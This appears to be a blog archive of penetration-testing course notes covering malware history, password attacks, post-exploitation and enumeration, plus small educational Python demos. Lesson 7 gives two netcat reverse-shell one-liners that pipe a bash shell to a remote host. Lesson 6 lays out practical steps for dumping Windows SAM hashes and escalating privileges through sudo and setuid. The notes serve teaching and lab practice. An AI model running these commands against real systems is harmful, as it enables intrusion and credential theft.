Monthly Archives: January 2016

CNS320 Lesson 8 – Malware

Lesson 8 – Malware

  • Blackmail and extortion run the gamut from encrypting your files and holding them for ransom to stealing intimate photos and making you pay the attacker not to blast them all over the internet

  • Don’t rely on slowdown and excessive CPU/RAM usage as your prime indicator…that’s usually just a sign that your computer is an old piece of shit.  Look for things you can actually verify instead: unexpected processes, new persistence entries (services, run keys, cron jobs), and connections to hosts you don’t recognize.

  • The malware author first designs the malware
  • Then the malware replicates across networks and machines to victim computers
  • The malware then launches and performs whatever action is intended (holding files for ransom, stealing sensitive info, installing keystroke loggers, enrolling the machine in a botnet, just trashing it, etc.)
  • Eventually, researchers and antivirus companies detect the malware in the wild, categorize it, and start building signatures for it
  • When that signature info is incorporated into AV products, antivirus can now recognize it…
  • …and start to eliminate the malware.  Note the gap in that timeline: from the first infection until the signature ships, signature-based AV is blind to it, which is why the evasion tricks below exist and why you can’t rely on signatures alone.

  • Boot sector viruses target the boot sector or Master Boot Record of hard drives, bootable floppies, CDs, USBs, etc.
  • File viruses infect files (duh).  Adobe PDF is a popular vector.
  • Program viruses infect executables.
  • Network viruses (according to the book) are viruses that spread over the network, usually via email.  It’s not really clear how this is different from a worm.
  • Source code viruses actually look for C, Java, or other source code on a machine and alter it to include malicious code.  These viruses are extremely rare.
  • Macro viruses, the bane of the ’90s, are written in the “macro language” of another application…such as an embedded VBA macro in a Word or Excel document.  Melissa (1999) was one of the most widespread macro viruses.  Macro malware tailed off once Office stopped running macros by default, but it has come back as a favourite dropper for Trojans and ransomware: the document asks the user to click “Enable Content,” and the macro downloads the real payload.
  • Multipartite viruses utilize more than one of the above methods to infect and spread

  • TSR (terminate-and-stay-resident) viruses stay loaded in memory after their host program exits, so they can keep infecting files that are opened or executed later; some also delete the dropper they arrived in, so there’s nothing on disk to point at.
  • Cavity viruses hide in unused space inside certain executables and file formats (padding between sections, for instance), so the host file’s size doesn’t change.
  • A tunneling virus tries to get underneath anti-virus software before it can detect malicious code: it locates the operating system’s original interrupt handlers and calls them directly (or hooks beneath them), bypassing the hooks the AV installed.  Resident “interceptor” programs that sit in the background watching for viruses are blinded while a tunneling virus is active.
  • Stealth viruses also evade antivirus by hooking system calls and interrupts, but they lie to whatever asks: a read of an infected file returns the clean original and a directory listing shows the original size, so AV (and the user) sees nothing changed.  The distinction the book draws is that stealth viruses intercept everything, whereas tunneling viruses only sidestep the AV’s own hooks.
  • Camouflage viruses crudely try to masquerade as a legitimate program.  They’re trivial for AV to find and kill.
  • Encrypted viruses carry a small decryption stub and keep the bulk of the viral body encrypted (typically a simple XOR with a key that changes per infection), so a signature written against the body won’t match.  The weakness is the stub itself, which stays constant and can be signatured instead.
  • Polymorphic and metamorphic viruses both change their code with each generation.  A polymorphic virus is an encrypted virus whose mutation engine also rewrites the decryption stub each time (equivalent instructions, junk code, reordered registers), but some part of that engine or its output stays recognisable, which is what AV latches on to.  A metamorphic virus rewrites its entire body, with no fixed stub or engine, and is correspondingly harder to catch with signatures; heuristics and emulation are needed instead.
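
Here’s a little Python to make the encrypted/polymorphic point concrete.  This is an added example for these notes, not code from the slides or from any real sample: the “viral body” is a constructed byte string, the decryptor stub is a fixed marker standing in for machine code, and the two signatures are made up for the demo.  It shows a body signature missing the encrypted sample, a stub signature catching it regardless of key, emulation recovering the body, and a rewritten stub (the metamorphic case) defeating both byte signatures.

```python
"""Signature scanning against an encrypted ("polymorphic") body.

Added example for these notes, not code from the original page. BODY is a constructed
byte string, STUB is a marker standing in for real decryptor code, and SIGNATURES are
made up for the demonstration."""
import random

# Constructed plaintext body: the bytes an AV signature would normally be written against.
BODY = b"[demo payload] encrypt_user_files(); send_ransom_note(); join_botnet();"

# Placeholder for the constant decryptor stub (0xEB 0x0B = 'jmp short +11' over the marker).
# On disk the sample is laid out as: STUB | 1-byte XOR key | XOR-encrypted BODY.
STUB = b"\xeb\x0bDECRYPTSTUB"

SIGNATURES = {
    "demo.body": b"encrypt_user_files(); send_ransom_note()",  # written against the body
    "demo.stub": STUB,                                          # written against the decryptor
}


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR: the classic cheap 'encryption' used by encrypted viruses."""
    return bytes(b ^ key for b in data)


def build_plain_sample() -> bytes:
    """An unencrypted infection: the body sits on disk as-is."""
    return BODY


def build_encrypted_sample(key: int, stub: bytes = STUB) -> bytes:
    """An encrypted infection: only the stub and the key are in the clear."""
    if not 1 <= key <= 255:
        raise ValueError("key 0 would leave the body in plaintext")
    return stub + bytes([key]) + xor_bytes(BODY, key)


def random_stub(seed: int) -> bytes:
    """Stand-in for a metamorphic rewrite of the stub: same role, different bytes each time."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(len(STUB)))


def scan(sample: bytes, signatures: dict = SIGNATURES) -> list:
    """Naive byte-pattern scanner: name every signature whose pattern occurs in the sample."""
    return [name for name, pattern in signatures.items() if pattern in sample]


def emulate_and_scan(sample: bytes, signatures: dict = SIGNATURES) -> list:
    """What AV does about encrypted bodies: recognise the stub, let it 'run' (here: parse
    the key and decrypt), then scan the decrypted output too. Works for any key, because
    the key has to be in the sample for the virus itself to run."""
    hits = scan(sample, signatures)
    if STUB in sample:
        pos = sample.index(STUB) + len(STUB)
        key = sample[pos]
        decrypted = xor_bytes(sample[pos + 1:], key)
        hits += [h for h in scan(decrypted, signatures) if h not in hits]
    return hits


if __name__ == "__main__":
    print("plain     :", scan(build_plain_sample()))
    print("xor 0x5a  :", scan(build_encrypted_sample(0x5A)))
    print("xor 0x13  :", scan(build_encrypted_sample(0x13)))
    print("emulated  :", emulate_and_scan(build_encrypted_sample(0x5A)))
    print("metamorph :", scan(build_encrypted_sample(0x5A, stub=random_stub(1))))
```

The key point is the last two lines: as long as the stub is constant, the defender signatures the stub and wins; once the stub is rewritten too, byte matching has nothing left to hold on to and the AV has to actually execute or emulate the code.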

  • Creeper was an experimental, benign self-replicating program unleashed on DEC PDP-10 computers running the TENEX operating system.  Reaper was a program written to get rid of Creeper instances, making it the first anti-virus.
  • Rabbit was the first example of a “fork bomb,” a virus that keeps forking new processes of itself until it uses up all the system resources and DoS’s the box
  • Fred Cohen was a graduate student at the University of Southern California who demonstrated the first documented “computer virus” with a proof-of-concept program in 1983 and an accompanying research paper; the term itself was suggested by his advisor, Leonard Adleman.
  • Elk Cloner was invented as a prank by teenage computer enthusiast Rick Skrenta.  It was a boot sector virus that infected Apple II floppy disks.  It was harmless, only displaying a taunting message to users, but it could occasionally ruin disks if it accidentally overwrote the wrong part of a floppy’s boot sector.
  • Brain was the first boot sector virus to infect MS-DOS machines, written by Pakistani programmers and brothers Basit and Amjad Farooq Alvi.  It was originally written as an anti-piracy measure for their own software, but unexpectedly spread to other disks.  Mikko Hyppönen of F-Secure tracked down the two brothers in 2011; they still run an IT business in Lahore.
  • The Morris Worm was unleashed on the ARPANET in 1988 by then Cornell University graduate student Robert Tappan Morris.  Morris said he did it as a way to gauge the size of the Internet, not to cause harm.  The worm spread using several methods: a debug backdoor in sendmail, a buffer overflow in fingerd, trusted-host relationships via rsh/rexec, and guessing weak passwords from a small built-in dictionary and the users’ own account info.  The worm carried no destructive payload; it would simply get onto a new machine, then look for network neighbors and spread to them too.
  • Morris had written it so that, if it detected there was already a copy of the worm installed, it wouldn’t reinfect……except every seventh time, it would install another copy of itself, ostensibly as protection against false positives or people trying to fool his worm and keep it from spreading.  With enough time, as the worm reinfected the same hosts continuously, it turned into a massive widespread DoS attack.
  • Morris became the first person convicted under the then-new CFAA law.  He eventually served three years probation, did 400 hours of community service, and was fined over $10,000.
  • Morris went on to found several Silicon Valley start-ups and is currently a tenured professor at MIT.

  • A floppy disk of the Morris worm’s source code in the Computer History Museum in Mountain View, CA

  • Pretty sure Michelangelo was the inspiration for the “Da Vinci virus” in the movie Hackers

  • Code Red worm exploited flaws in Microsoft IIS web servers; Nimda was another devastating worm/file infector combo that used other means to propagate (email, open shares, browsing infected sites), but could also exploit backdoors left behind by old Code Red II infections
  • Beast was one of the first reverse shell RATs for Windows.
  • Slammer exploited a buffer overflow in Microsoft SQL Server and Desktop Engine (MSDE) over UDP port 1434.  It had no payload beyond spreading, but it spread so fast (most of the vulnerable population in about ten minutes) that its scanning traffic alone knocked networks offline.
  • Blaster spread via a buffer overflow in the RPC service on TCP port 135 and would try to use infected hosts to DDoS the Windows Update website with a SYN flood.
  • Sasser was another big DoS worm that exploited LSASS (the Local Security Authority Subsystem Service) over TCP port 445 on Windows 2000 and XP; infected machines would crash and reboot repeatedly
  • Zeus is one of the longest-lived bank credential-stealing Trojans, kept alive through changes and variants such as the newer GameOver ZeuS offshoot and merging code with the SpyEye trojan.
  • Conficker was a worm that exploited a vulnerability in the Windows Server service (MS08-067) and also spread via weak admin-share passwords and USB autorun; its peer-to-peer update channel and domain-generation algorithm made it a textbook case for botnet takedown efforts
  • Stuxnet and Duqu may very well be the first and some of the most successful cyberweapons.  Reporting based on leaks from inside the US government alleges Stuxnet was developed as part of a US/Israeli joint operation to target and destroy Iranian uranium enrichment centrifuges.
  • Blackhole is an example of an “exploit kit” or “crimeware kit,” that allows low-skilled cybercriminals to put together bank credential-stealing or botnet-enrolling trojans of their own.
  • Flashback made waves as one of the first widespread Mac OS X pieces of malware.  It used a vulnerability in Java and spread through malicious websites.
  • Flame is another cyberweapon, supposedly developed by the NSA and Israel.
  • CryptoLocker kicked off the era of encryption ransomware.  It and its copycats would infect a machine, encrypt all the user’s personal files, then hold them for ransom.  If the user paid the ransom (usually an amount set in a pseudonymous cryptocurrency like Bitcoin), the malware creator would give them the decryption key so they could access their files again.  Offline backups that the infected machine can’t reach are the only reliable defence.

  • Glance over this list, because you may see a question or two about suspicious ports on your exam.

  • Air-gapping means the machine is not connected to other machines over network connections.  That raises the bar but doesn’t end the game: Stuxnet reached its air-gapped targets on USB sticks carried in by people, so removable media (and the humans carrying it) become the attack surface.



CNS320 Lesson 7 – Post-Exploitation

Lesson 7 – Post-Exploitation

  • Netcat is a tool you will need to get very comfortable with as a pentester.  Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports.  It’s built into almost every Linux or Unix OS (including OS X) and versions are available for Windows and other OSes too.
  • Some of the popular clones of netcat include ncat (part of the Nmap project and bundled with it, with a built-in --ssl option), socat, CryptCat (which encrypts your traffic with Twofish), and many others

  • Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers.  Or even pentesters on engagements, for that matter.

  • Stego-only attack: you only have the medium with the hidden data in it
  • Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
  • Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
  • Known-stego attack: you know the steg method used and you have access to the original and modified medium
  • Chosen-stego attack: you have access to different steg tools and you try each of them and look for similarities to determine which method was used for the file you’re analysing
  • Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures
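
To make the known-cover attack concrete, here’s a small Python LSB steganography demo.  This is an added example, not code from the slides or any real steg tool: the “image” is a constructed array of 8-bit grayscale pixel values, the message is made up, and the embedding scheme (16-bit length header followed by message bits, one bit per pixel LSB) is a textbook scheme chosen for the demonstration.  With the original cover in hand, a plain diff shows exactly which pixels were touched, that every change is confined to the low bit, and where the payload sits; knowing the scheme then gives you the message back.

```python
"""LSB steganography and the known-cover attack.

Added example for these notes, not code from the original page. The cover "image" is a
constructed list of grayscale pixel bytes, the message is made up, and the embedding
scheme (16-bit big-endian length header, then message bits MSB-first, one per pixel LSB)
is a simple textbook scheme, not a specific tool's format."""

HEADER_BITS = 16


def _bits(data: bytes):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover: bytes, message: bytes) -> bytes:
    """Write len(message) as a 16-bit header, then the message, into the pixels' LSBs."""
    if len(message) >= 1 << HEADER_BITS:
        raise ValueError("message too long for a 16-bit header")
    payload = len(message).to_bytes(2, "big") + message
    if len(payload) * 8 > len(cover):
        raise ValueError("cover too small: need one pixel per bit")
    pixels = bytearray(cover)
    for i, bit in enumerate(_bits(payload)):
        pixels[i] = (pixels[i] & 0xFE) | bit
    return bytes(pixels)


def _read_bits(pixels: bytes, start: int, count: int) -> int:
    value = 0
    for i in range(start, start + count):
        value = (value << 1) | (pixels[i] & 1)
    return value


def extract(stego: bytes) -> bytes:
    """Known-stego recovery: read the header, then exactly that many bytes."""
    length = _read_bits(stego, 0, HEADER_BITS)
    if HEADER_BITS + length * 8 > len(stego):
        raise ValueError("header claims more data than the image holds")
    return bytes(_read_bits(stego, HEADER_BITS + 8 * k, 8) for k in range(length))


def known_cover_attack(cover: bytes, stego: bytes) -> dict:
    """With the original medium, a diff shows which pixels changed and that only the LSB
    did. The span of changed pixels brackets the payload; unchanged pixels inside that
    span carried bits that already matched the cover."""
    changed = [i for i, (a, b) in enumerate(zip(cover, stego)) if a != b]
    lsb_only = all((a ^ b) == 1 for a, b in zip(cover, stego) if a != b)
    region = (changed[0], changed[-1]) if changed else None
    return {"changed": changed, "lsb_only": lsb_only, "region": region}


def lsb_ones_ratio(pixels: bytes, start: int, end: int) -> float:
    """Stego-only heuristic: compare the LSB plane's ones-ratio between regions. Smooth or
    quantised imagery has a skewed LSB plane; embedded data pushes it toward 0.5."""
    chunk = pixels[start:end]
    return sum(p & 1 for p in chunk) / len(chunk) if chunk else 0.0


def make_cover(size: int = 1024) -> bytes:
    """Constructed cover: a slow gradient quantised to even values, so its LSB plane is all 0."""
    return bytes(((i // 32) * 2) % 256 for i in range(size))


if __name__ == "__main__":
    cover = make_cover()
    stego = embed(cover, b"meet at dawn")
    print(extract(stego))
    print(known_cover_attack(cover, stego)["region"])
    print(lsb_ones_ratio(stego, 0, 112), lsb_ones_ratio(stego, 112, len(stego)))
```

The stego-only heuristic only works because this constructed cover has a boring LSB plane; real photographs have noisy low bits, which is exactly why LSB hiding in photos is harder to detect without the cover and why the known-cover case is the easy one.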

  • The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.

  • Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali.  Check out README.Debian and README.gz.  Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
  • Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd.  netcat-openbsd is the version you’ll find installed by default on Debian, Ubuntu, and their derivatives (the Red Hat family ships Nmap’s ncat instead).  The main difference is that the OpenBSD variant has had the “-e” option (execute a program once connected) removed, as a measure to make it harder to leave backdoors.
  • Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag (both assume you have a listener waiting on the other end, e.g. nc -l -p <port> on your box):
    1.)     mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
    2.)     mkfifo pipe && nc <remote server> <port> < pipe | /bin/bash &> pipe         <——– this one is better, because it will also pipe stderr to you (so you can see error messages).  Note that “&>” is a bash-ism; if the target’s shell is a plain /bin/sh, use “> pipe 2>&1” instead.


This is the point in the class where I would start doing actual CTF challenges with the students.  What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack.  I had pretty small classes, so I this was doable.  I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.

But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself.  Here are the first few I started them out on:

You can easily download the ISO images and run them in VMware or VirtualBox.  I urge you to try to solve them on your own.  The De-ICE ones do have a hint page in the target machine’s website.  If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.

Good luck!

CNS320 Lesson 6 – Exploitation

Lesson 6 – Exploitation

  • If you have the ability to listen to traffic on the network (on an open WiFi access point or an old network using hubs, for instance), you could easily find poorly-protected passwords going over the wire.  Services like telnet, FTP, and badly-written websites transmit passwords in plaintext over unencrypted channels.
  • The other option is, if the network doesn’t let you sniff all traffic, then make the traffic come through you!  A man-in-the-middle (MiTM) attack means you get in between your victim and the target you want to access, so you can sniff passwords or other sensitive info.  More on this subject to come.
  • A complement to a MiTM attack, or perhaps other attacks we’ll talk about later like cross-site scripting (XSS) or pass-the-hash, is to try a replay attack.  If a system has poor session management or authentication processes, you might be able to capture a hash, access token, session cookie, or similar and just send it to the server, letting you in without ever having to guess or crack your victim’s password.
  • An active online attack would be password guessing, where you connect to the system, web app, etc. and try different passwords.

  • Offline attacks mean that you’ve captured password hashes, either by stealing the authentication database from a web app, or the Windows SAM file, the Linux shadow file, or similar.  The passwords are stored in a cryptographic hash format, meaning they’ve been run through a one-way algorithm to generate a fixed-length hash (which usually looks like hexadecimal gobbledegook).  The way to crack hashes is to run different words or strings of characters through the same hashing algorithm (such as NTLM for Windows or, for far too many web apps, plain unsalted MD5), and if you get a match against the stolen hash, then you know that word or string of characters is the password.  Nothing is being “decrypted” here: it’s guess-and-check, which is why slow, salted hashes (bcrypt, scrypt, PBKDF2) are the defender’s answer.
  • A dictionary attack is just like what it says: take a dictionary of words, common passwords, or what-have-you and throw it against the system.  The most common and the most effective type of attack.  Kali Linux has several dictionaries in the /usr/share/wordlists directory.  One of the most widely-used is the RockYou list, a dump of over 14 million real-world passwords from the 2009 breach of the RockYou social gaming/widget company; it’s valuable precisely because it shows what people actually choose.  You’ll also find other wordlists and dictionaries in other apps’ directories in the /usr/share tree.
  • Brute-forcing is trying every possible character combination until you find the password.  In essence, you start at “a”, then try “b”, eventually you work up to “aa”, and so on.  In the end, brute forcing will always win…it’s simply a matter of whether it’ll take minutes or centuries to finally guess your password.
  • Hybrid attacks are anything in between.
  • Rainbow tables (AKA precomputed hashes) trade time for space: you hash an enormous candidate space up-front and store the results (compressed into chains of hash/reduce steps, which is what makes them “rainbow” tables rather than plain lookup tables), so that a captured hash can be looked up in seconds, and the same table reused against multiple targets (for example a table covering every LM or NTLM hash up to a certain length).  They only work against unsalted hashes; a per-user salt would require a separate table per user, which is the whole point of salting.
  • Syllable attacks are a combination of dictionary and brute-forcing, where you might try different permutations of dictionary words (like “password” > “password1” > “p@ssw0rd” etc.)
  • Rule-based attacks are where you have some sort of intelligence about the password policy.  For example, you know that passwords on the system have to be between 8 and 12 characters long, have to have one upper-case and one lower-case letter, and only allow “!” or “@” for special characters.  You could then tailor the attack to only try out guesses that match those rules, e.g., you wouldn’t waste time trying a password like “passwd” or “pa$$word”.  Just make sure the policy was actually enforced when the passwords were set, or you’ll filter out the very guesses that would have hit.
  • A distributed attack could be any of the above, except that instead of just one computer trying to crack the password, multiple machines in parallel each take a slice of the wordlist or keyspace.  Criminals do this with botnets; everyone else does it with racks of GPU machines.

  • Shoulder surfing is when an attacker gets close enough to a victim as they are entering their password to watch the keys pressed.
  • Keyboard sniffers are hardware- or software-based tools that capture the keystrokes a user puts in, which an attacker can then read and learn the victim’s password
  • To paraphrase Kevin Mitnick, why spend hours cracking hashes when users will just give you their passwords?  We’ll cover social engineering more later.

  • John the Ripper is one of the oldest and most widely-used password cracking tools.  It can quickly perform dictionary or brute-force attacks on password hashes.
  • Hashcat is a newer program that offers various types of dictionary, brute-force, and hybrid attack options.  It can also utilize the GPU graphics cards in computers for extremely-fast cracking.
  • Cain and Abel is a Windows-only all-in-one hacking tool.  Password hash cracking is one of its many features.
  • Ophcrack and L0phtCrack are both famous tools for cracking Windows LM and NTLM hashes: Ophcrack is a cross-platform, rainbow-table based cracker best known for its bootable LiveCD, and L0phtCrack is the Windows tool from the L0pht crew that dates back to the late 1990s
  • RainbowCrack is, you guessed, used to generate rainbow tables and crack hashes against them
  • There are many other password cracking tools out there, many tailored to specific sorts of password hash formats.

  • THC Hydra is the old gold-standard for brute forcing everything from SSH to FTP to online forms to Cisco appliances.  It takes a user or list of users, then a wordlist of potential passwords, and will go to work brute-forcing logins.
  • Medusa is a work-alike to Hydra that’s meant to be faster and more stable.
  • CeWL is a custom wordlist generator.  It can spider a target’s website(s) and use the information it gathers to build customized wordlists of potential passwords to try out.
  • Burp Suite, WebScarab, and ZAP are all HTTP/S intercept proxies that can be used to attack web logins.  We’ll talk more about them in our lessons on web vulnerabilities.

  • The SAM is well-known for holding local usernames and password hashes, but on its own it’s useless: the hashes are encrypted with a boot key that lives in the SYSTEM hive, so you need both.  The SECURITY hive adds cached domain logon credentials (for AD users who have logged into the box) and LSA secrets such as service account passwords, which is why the three are usually grabbed together
  • Active Directory Domain Controllers have a domain-wide password hash database called NTDS.dit.  If you get NTDS.dit, you have the hashes of every user in the domain.
  • SAM, SYSTEM, and SECURITY are stored in C:\Windows\System32\config\ and the NTDS.dit file is stored in C:\Windows\NTDS\ (NTDS.dit also needs the SYSTEM hive from that DC to decrypt)
  • You can’t normally copy the SAM, SYSTEM, and SECURITY files while a Windows machine is running because they’re locked, but as an administrator you can export them with reg save HKLM\SAM sam.hiv (and likewise for SYSTEM and SECURITY), dump the hashes out of the LSASS process memory, or pull copies out of Volume Shadow Copy Service (VSS) snapshots, if they exist.  If you have physical access, you can turn the machine off, boot it from a Linux LiveCD or LiveUSB, mount the Windows hard drive, and steal the files.

  • There are lots of tools that will try to dump the SAM, either out of memory or out of Volume Shadow Copy Service (VSS) snapshots, including pwdump, fgdump, and others.  There’s a cat-and-mouse game between these tools and antivirus detection engines, so they’re constantly being updated, changed, or new ones written.
  • chntpw is a Linux utility you can use when you mount a hard drive with Windows on it to steal hashes or overwrite them with your own
  • NTDSXtract is for stealing hashes from NTDS.dit files
  • Kon-Boot used to be a free tool that is now for-pay, unfortunately.  You would boot it from a CD or USB stick, it would run first, then it would boot Windows and act as a man-in-the-middle rootkit, allowing you to completely bypass the password screen and gain instant access to a Windows workstation.
  • Volume Shadow Copy Service (VSS) is a Windows service that takes point-in-time snapshots of volumes on the running Windows OS.  If you have admin-level privileges, you can often find copies of the SAM and other locked files in those snapshots, which is the standard way around the file locks.  There are numerous tools available to automate this.
  • As mentioned, you can just boot Linux from a CD or USB on the victim machine, mount the Windows drive, and steal the file that way

  • WMIC = Windows Management Instrumentation Command-Line
  • Example: “wmic qfe get Caption,Description,HotFixID,InstalledOn” lists all the hotfixes and security patches applied to that Windows install, which you then compare against a list of known privilege-escalation bugs to see what’s missing (the PowerShell equivalent is Get-HotFix)

  • As you’ll see, there are a lot of things that can go wrong with Linux, especially with regard to privilege escalation via setuid or sudo

  • When Linux programs crash, they often “dump core”: the kernel writes the crashed process’s memory to a file for diagnosing what caused the crash.  If a privileged or security-sensitive program dumps core somewhere you can read, that file can contain passwords, keys, and other secrets that were sitting in memory.
  • Users of SSH will have a hidden directory called .ssh automatically created in their home folder.  This could contain private keys they use to log in to other servers (and known_hosts tells you where to try them).

  • Cron is the task scheduling system used by most Linux/Unix systems.  Unfortunately, cron jobs can be all over the place, depending on who or what is scheduling them: /etc/crontab, drop-in files in /etc/cron.d/, the /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly directories, and per-user tables under /var/spool/cron/ (crontabs/ on Debian-based systems).  A root cron job that runs a script you can write to is a privilege escalation waiting to happen.

  • Hence why dd is sometimes said to stand for “disk destroyer” 🙂

  • Example: you hacked an account with sudo rights, but all it can do is use sudo to execute one particular script.  If you can write to that script, or to the directory it lives in, just delete the script (rm), put a shell in its place under the old name (cp /bin/bash <old name>, or ln if it’s on the same filesystem), then run it with sudo and bam, you have root!  Sudo only checks the path, not what’s behind it.
  • Another one is if you’re granted sudo rights to some sort of program that can edit files, like nano, vim, or even a hex editor.  You can then run it and change the sudoers file to expand that compromised account’s rights or grant rights to another account of your choosing.  The same goes for anything with a shell escape (less, more, man, find -exec, awk’s system(), and so on).

  • Normally, in Linux and Unix, when you run a program, it runs with your own level of permissions.  But some programs need to run at a higher level of privilege in order to use special OS services, like the “mount” utility that has to interact with the kernel to mount new filesystems, or “passwd”, which has to write to /etc/shadow.  Instead of giving everyone root permissions, you can just set the “setuid” bit on the program so that when normal users run it, it runs as its owner (root).
  • An example of exploiting this would be if a text editor owned by root had the setuid attribute set.  If you ran it, you could then go edit the sudoers file, open up and read the shadow file, or otherwise get access to sensitive files beyond your access level.  That’s why the standard first move on a new shell is find / -perm -4000 -type f 2>/dev/null and a hard look at anything that isn’t a stock system binary.
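
The flip side of hunting for these is checking for them on your own boxes, so here’s an added Python audit script for the two weaknesses above (sudo rules and setuid binaries).  This is example code for these notes, not from the slides or any existing tool; the sudoers text it chews on is constructed, and the SHELL_ESCAPES list is an illustrative subset of programs that hand out a shell or arbitrary file writes when run as root (GTFOBins is the real reference), not a complete one.

```python
"""Audit the two Linux privesc paths above: over-generous sudo rules and setuid files.

Added example for these notes, not code from the original page. SAMPLE_SUDOERS is a
constructed file and SHELL_ESCAPES an illustrative subset (see GTFOBins for the real list)."""
import os
import re
import stat
import tempfile

SHELL_ESCAPES = {"vi", "vim", "nano", "less", "more", "man", "find", "awk", "python", "perl",
                 "bash", "sh", "env", "tee", "rsync", "hexedit", "ed"}

# user  host = (runas) [TAG:] cmd, cmd ...   (Defaults, aliases and includes are skipped)
USER_SPEC = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias", "@include")

SAMPLE_SUDOERS = """\
# constructed /etc/sudoers for the demonstration
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/vim
www-data ALL=(root) /opt/scripts/rotate-logs.sh
deploy  ALL=(root) NOPASSWD: /bin/systemctl restart app
"""


def parse_sudoers(text: str):
    """Yield (user, host, runas, tags, command) for each command of each user spec."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        match = USER_SPEC.match(line)
        if not match:
            continue
        user, host, runas, commands = match.groups()
        tags = set()  # a tag such as NOPASSWD: applies to every command after it on the line
        for command in (c.strip() for c in commands.split(",")):
            while ":" in command and command.split(":", 1)[0].strip().isupper():
                tag, command = command.split(":", 1)
                tags.add(tag.strip())
                command = command.strip()
            yield user, host, (runas or "root").strip(), frozenset(tags), command


def audit_sudoers(text: str) -> list:
    """Return (severity, user, command, reason) findings for non-root users."""
    findings = []
    for user, _host, runas, tags, command in parse_sudoers(text):
        if user == "root":
            continue
        exe = command.split()[0]
        name = os.path.basename(exe)
        if command == "ALL":
            findings.append(("critical", user, command, "unrestricted sudo"))
        elif name in SHELL_ESCAPES:
            findings.append(("high", user, command, f"{name} escapes to a shell as {runas}"))
        elif not exe.startswith("/"):
            findings.append(("high", user, command, "relative path: user supplies the binary"))
        if exe.endswith((".sh", ".py", ".pl")):
            findings.append(("medium", user, command, "script target: replace it if writable"))
        if "NOPASSWD" in tags:
            findings.append(("medium", user, command, "no password: any hijacked session works"))
    return findings


def replaceable_target(path: str) -> bool:
    """The trick from the notes: a sudo rule for one script is as good as ALL if the file
    or its directory is writable by the current user."""
    return os.access(path, os.W_OK) or os.access(os.path.dirname(path) or ".", os.W_OK)


def classify_mode(mode: int, uid: int):
    """'setuid-root' for root-owned setuid files (the ones that matter), 'setuid' for
    other owners, 'setgid' for setgid files, None otherwise."""
    if mode & stat.S_ISUID:
        return "setuid-root" if uid == 0 else "setuid"
    if mode & stat.S_ISGID:
        return "setgid"
    return None


def find_setuid(root: str = "/") -> list:
    """Equivalent of find / -perm -4000 -o -perm -2000: (path, kind) for flagged files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            kind = classify_mode(st.st_mode, st.st_uid) if stat.S_ISREG(st.st_mode) else None
            if kind:
                hits.append((path, kind))
    return hits


def demo_writable_script() -> str:
    """Constructed stand-in for a misconfigured sudo target: a script we can overwrite."""
    path = os.path.join(tempfile.mkdtemp(prefix="sudo-demo-"), "rotate-logs.sh")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho rotating\n")
    return path


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
    print(replaceable_target(demo_writable_script()))
    print(find_setuid("/usr/bin")[:5])
```

Run it as the low-privilege user you’re auditing from: replaceable_target and os.access answer for the current user, which is exactly the question an attacker in that account would be asking.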

  • If you always type “ls -al” when listing directory contents, you might make an alias of “ll” or “lal” or even just “ls” for that command and save it to your shell’s config file (usually .profile or .bashrc or similar).  An attacker can use the same mechanism against users: an alias in a victim’s .bashrc can silently run a rootkitted version of top, ps, or free that hides your activity, or a wrapper around sudo or ssh that logs the password before passing it on.
  • chroot is in every Unix-like system.  Jails are much stricter and are mostly seen on FreeBSD and its derivatives.



CNS320 Lesson 5 – Enumeration

Lesson 5 – Enumeration

  • Enumeration is often easy because sysadmins don’t go to the trouble of properly configuring systems and locking them down.
  • Good enumeration saves you time.  You could try every username under the sun, but it’s a better use of your time and effort to figure out for sure which users have accounts on the system and focus on breaking into their accounts.

  • SMB = Server Message Block; AKA CIFS (Common Internet File System); AKA Windows shares
  • Remember, SMB isn’t just on Windows boxes!  Mac OS X has switched to SMB as its default network file sharing protocol (replacing AFP) and many Linux systems support it via an open-source implementation called Samba.
  • All that said, the null session is kind of a played-out misconfiguration.  It’s mentioned in a lot of pentesting literature, because legacy systems might still have it enabled, and if you do find it, it’s an awesome means of mining data about your target.  However, it’s becoming rarer and rarer, especially in Windows 7/8/10 environments.

  • Winfo is a Windows tool that automates the process of enumerating information using null sessions
  • The original enum was a Windows tool and a work-alike (enum4linux) was written in perl for Linux.  Like winfo, it automates the process of attempting null session attacks and enumeration.
